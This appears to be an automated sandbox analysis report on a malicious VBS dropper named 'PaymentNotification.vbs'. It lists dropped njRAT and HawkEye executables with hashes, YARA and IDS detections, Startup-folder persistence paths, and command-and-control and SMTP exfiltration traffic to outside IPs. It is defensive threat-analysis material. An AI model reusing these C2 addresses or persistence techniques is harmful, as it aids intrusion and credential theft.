Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................N.... ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...u.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...Vr^%.p~....(o....#....s...

C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\pgr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	532992
Entropy (8bit):	6.506949900240727
Encrypted:	false
SSDEEP:	6144:juJEqxmd0bS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnxp:Td0QtqB5urTIoYWBQk1E+VF9mOx9si
MD5:	5C0E9E0C72288F8B70BB68C0036ECB52
SHA1:	920C9ECF8EBD35A8D0FF53A67A9C5DB2F1C35F59
SHA-256:	249026BE43AFFBDC61BE8DD1AAE8602668BA6BEE72E43D4760B2ACC7AB1526D4
SHA-512:	F7A508AA110DB5BF1BD0E6B867D777525B0C17719A54B3E881CE7E8BD544152BF1E0BEC12509028A302559CF987A3956D2409364F601F015559D67437CF8FB0D
Malicious:	true
Yara Hits:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Arnim Rupp Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.....................4........... ........@.. ....................................@.................................d...W.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..4..............X...........................................2s..............0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(............................0.. .........(....(..........(.....o..........................(......(.......o.......o.......o.......o.......R..(....o....o......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\pgr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.525319833157279
Encrypted:	false
SSDEEP:	384:o8aZYC9twBNdcvFaly2H0dbJo6HghcASEJqc/ZmRvR6JZlbw8hqIusZzZU4:uY+sNKqNHnSdRpcnuq
MD5:	A08F2FAC257ABBBDDDBBD4439F32CFD0
SHA1:	26D3ED4771B701A82F6AA32B747E27BB26E9864C
SHA-256:	BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
SHA-512:	3BEAD648A1AD82BD4E5599A55AE573B4CE6DC24EBDC3F0DAEC2C0A327CA1BF5E45A254E4F2480CEE0FEC0A4F83B15863679A63F7DCC0CE37D8F50E644BEFEF40
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 91%, Browse Antivirus: ReversingLabs, Detection: 91%
Joe Sandbox View:	Filename: 12_pgr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..`.................V...........t... ........@.. ....................................@.................................4t..W.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................pt......H.......,K...)....../....................................................0..........r...p.....r...p...........r%..p.....r;..p.....rE..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r+..p..............0..;.......~....o....o....r-..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r-..p~....(....o......(....o.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Download File
Process:	C:\Users\user\AppData\Roaming\servieda.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6963200
Entropy (8bit):	5.550691485739008
Encrypted:	false
SSDEEP:	49152:nLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL7:
MD5:	08C62FEA3D61370C3CA97568656D8304
SHA1:	2EF6CE8EF54231434E46A51F8604DC72C6831246
SHA-256:	52CA7E417C7A85F7E7337BE8DDD76A3B2508343DD63B4C274C34D9B513907BF5
SHA-512:	C3B5D0C62BCF015AA363786FDC12675400A4A1177E4DFF5F4B9099CD5A05D316372AC32E1E276171385B2941A3C27843758BBA7DBA5F898966AD27B8B7160BE7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(..........(........s.........s.........s.........s.........s..............0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....

C:\Users\user\AppData\Roaming\pid.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	6E616E79D491BA42638558CAF0364003
SHA1:	74F5C11138CDB6F32822F4120E4F4F9D027D3EBB
SHA-256:	23850EB82A923C694AFCFF74746BFEC1AF8099C034E73EFF71978FCEF7A23FD3
SHA-512:	091AEE6AAD44DADDA5E2FEDA9E2363722434F815BCD0FB0270E1DD9F9C1F5B0740C8CC302170682C58DDC86F8F4CF6B330B6393E8ABDF000B9128B3044F7B182
Malicious:	false
Preview:	4928

C:\Users\user\AppData\Roaming\pidloc.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.3728327481476805
Encrypted:	false
SSDEEP:	3:oNN+E2J5xAIMig:oNN723ftg
MD5:	3C9A412CE21ACF36264B3DA202706434
SHA1:	1D1F182C985DA55FABC80E25A5E8F4047B24EA3E
SHA-256:	EDFF7D00050F7D79BA480C90741880859E5B1D31DE462FE0088D029315A39DB3
SHA-512:	629A0BEC067E72B4E292AFFD7526A3BE35258EFBF358A5C891FD0D2B77F25F05EB80CAFFDACCF5E01D44BC8D3459E70F0EE43A1D95503B5207496B02D41EE7B0
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

C:\Users\user\AppData\Roaming\servieda.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Tmp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.550691485739008
Encrypted:	false
SSDEEP:	768:Xq47KHbq7NIowMZVHC8kUYUsFWn4UVm7JsWYKcOvt9t9cFKpBBDZ0DauldK:Ubq7JrDCR3UP4UVkRYw/tekpBBWdK
MD5:	9B30598F8F05C46F8ABB22A4C2ABCC9E
SHA1:	73665A73C48C889AF51EC9C99D8432218676B0CD
SHA-256:	2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
SHA-512:	35B2D08550387CAFED531B6EE3BA81CF1567E0E6934263044896060E39C6A865A8176A9817E259DD0527FC021E2DC9C9845649125EDF5CBFF1FB198AF3175360
Malicious:	true
Yara Hits:	Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 78%, Browse Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(..........(........s.........s.........s.........s.........s..............0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.971939296804078
Encrypted:	false
SSDEEP:	6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
MD5:	689E2126A85BF55121488295EE068FA1
SHA1:	09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256:	D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512:	C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious:	false
Preview:	..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

Static File Info

General
File type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Entropy (8bit):	3.5935554485710077
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	PaymentNotification.vbs
File size:	356096
MD5:	f5b9f4ae6470dd78d53b60dcc6b32a5b
SHA1:	c12a160ff346463dfea1a2a5b015b0efd56a9645
SHA256:	3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
SHA512:	891a78a7fae35b7bec30254bd88c458c940ec25c347f9f0ff0e83fa23a93b166d80f825b74a57781ebfb3e55a80a355131677db32a5510e86728fae4977e9bef
SSDEEP:	3072:N3n1hOhJ4d+NxpBmFxHJCABjHf67j4be1:N3ahs+7aBjHy7j4q1
File Content Preview:	..U.n.S.N. .=. .(.".=.=.Q.K.i.U.G.e.l.5.i.c.n.B.H.X.i. ..+..+..+..+..+.. .". .+. ._. .....".i.J.g.Y.X.Z.E.F.G.a.T.h.i.b.1.J.n.L.s.V.H.d.o.N. ./.4.5.6./.Z.h.h.2.b.5.p.H.b.6.h. ./.4.5.6./.Y.n.R.3.b.q.V.G.a. ./.4.5.6./.h. ./.4.5.6./.C.N.k.C.M.w. ..+.

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/28/21-20:49:31.646373	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.681609	ICMP	449	ICMP Time-To-Live Exceeded in Transit			84.17.52.126	192.168.2.6
04/28/21-20:49:31.682134	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.717620	ICMP	449	ICMP Time-To-Live Exceeded in Transit			149.11.89.129	192.168.2.6
04/28/21-20:49:31.718700	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.755896	ICMP	449	ICMP Time-To-Live Exceeded in Transit			130.117.49.165	192.168.2.6
04/28/21-20:49:31.757037	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.799677	ICMP	449	ICMP Time-To-Live Exceeded in Transit			130.117.0.18	192.168.2.6
04/28/21-20:49:31.811880	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.858721	ICMP	449	ICMP Time-To-Live Exceeded in Transit			154.54.36.53	192.168.2.6
04/28/21-20:49:31.878720	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.925196	ICMP	449	ICMP Time-To-Live Exceeded in Transit			130.117.15.66	192.168.2.6
04/28/21-20:49:31.925617	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.989344	ICMP	449	ICMP Time-To-Live Exceeded in Transit			195.22.208.117	192.168.2.6
04/28/21-20:49:31.989900	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:32.042782	ICMP	449	ICMP Time-To-Live Exceeded in Transit			93.186.128.39	192.168.2.6
04/28/21-20:49:32.043298	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:32.095652	ICMP	408	ICMP Echo Reply			2.23.155.226	192.168.2.6
04/28/21-20:50:00.545812	TCP	2021176	ET TROJAN Bladabindi/njRAT CnC Command (ll)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:10.806596	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:13.866114	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:19.524323	TCP	2022062	ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager)	3429	49706	185.140.53.71	192.168.2.6
04/28/21-20:50:20.210801	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:21.271866	TCP	2019216	ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:22.960689	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:26.000113	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:28.681312	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	5622	49715	185.140.53.71	192.168.2.6
04/28/21-20:50:29.833873	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:36.102041	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:40.143989	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:48.411842	TCP	2022062	ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager)	3429	49706	185.140.53.71	192.168.2.6
04/28/21-20:50:49.632938	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:49.949509	TCP	2019216	ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:52.219899	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:52.553161	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:55.242661	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:55.724475	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49724	104.16.154.36	192.168.2.6
04/28/21-20:50:58.275348	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:51:00.137141	TCP	2019926	ET TROJAN HawkEye Keylogger Report SMTP	49726	587	192.168.2.6	103.6.196.196
04/28/21-20:51:10.877411	TCP	2019926	ET TROJAN HawkEye Keylogger Report SMTP	49732	587	192.168.2.6	103.6.196.196

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2021 20:49:37.990577936 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.195584059 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.195766926 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.219413996 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.424576044 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424655914 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424707890 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424758911 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424762011 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.424798965 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424804926 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.424869061 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.428610086 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.428675890 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.428745031 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.428819895 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.481906891 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.687988997 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.688313961 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.688452005 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.726054907 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.931335926 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.946767092 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.946872950 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:39.932044983 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:39.932076931 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:39.932221889 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:55.773941040 CEST	49705	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:49:56.026283979 CEST	5471	49705	185.140.53.71	192.168.2.6
Apr 28, 2021 20:49:56.373271942 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:56.531897068 CEST	49705	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:49:56.797717094 CEST	5471	49705	185.140.53.71	192.168.2.6
Apr 28, 2021 20:49:57.298255920 CEST	49705	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:49:57.555747032 CEST	5471	49705	185.140.53.71	192.168.2.6
Apr 28, 2021 20:49:59.948956013 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.093055964 CEST	49707	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.198863029 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:00.198971987 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.342957020 CEST	5471	49707	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:00.545811892 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.844831944 CEST	49707	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.877640963 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:00.877872944 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:01.134840965 CEST	5471	49707	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:01.204977989 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:01.641880989 CEST	49707	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:01.906229019 CEST	5471	49707	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:04.411237955 CEST	49708	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:04.702158928 CEST	5471	49708	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:05.204546928 CEST	49708	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:05.466819048 CEST	5471	49708	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:05.877341032 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:05.970139980 CEST	49708	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:06.215763092 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:06.226924896 CEST	5471	49708	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:06.479783058 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:06.483153105 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:06.796451092 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:08.738342047 CEST	49709	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:08.992042065 CEST	5471	49709	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:09.501801014 CEST	49709	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:09.722892046 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:09.767294884 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:09.773319006 CEST	5471	49709	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:10.283020020 CEST	49709	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:10.563333035 CEST	5471	49709	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:10.806596041 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:11.120780945 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:13.288209915 CEST	49710	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:13.570292950 CEST	5471	49710	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:13.768337965 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:13.814531088 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:13.866113901 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:14.080163956 CEST	49710	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:14.175697088 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:14.268445015 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:14.326714993 CEST	5471	49710	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:14.574331045 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:14.830269098 CEST	49710	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:15.082739115 CEST	5471	49710	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:17.600140095 CEST	49711	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:17.852123976 CEST	5471	49711	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:18.357610941 CEST	49711	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:18.605947971 CEST	5471	49711	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.118047953 CEST	49711	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.381472111 CEST	5471	49711	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.524322987 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.524430037 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.524538994 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.525321960 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.525345087 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.525717974 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.526730061 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.526819944 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.526949883 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.527431965 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.527494907 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.528115988 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.528239965 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.528333902 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.782867908 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.783132076 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.783231974 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.783407927 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.787055016 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.787139893 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.788295984 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.788324118 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.788341999 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.788357019 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.788376093 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.788388014 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.788399935 CEST	3429	49706	185.140.53.71	192.168.2.6
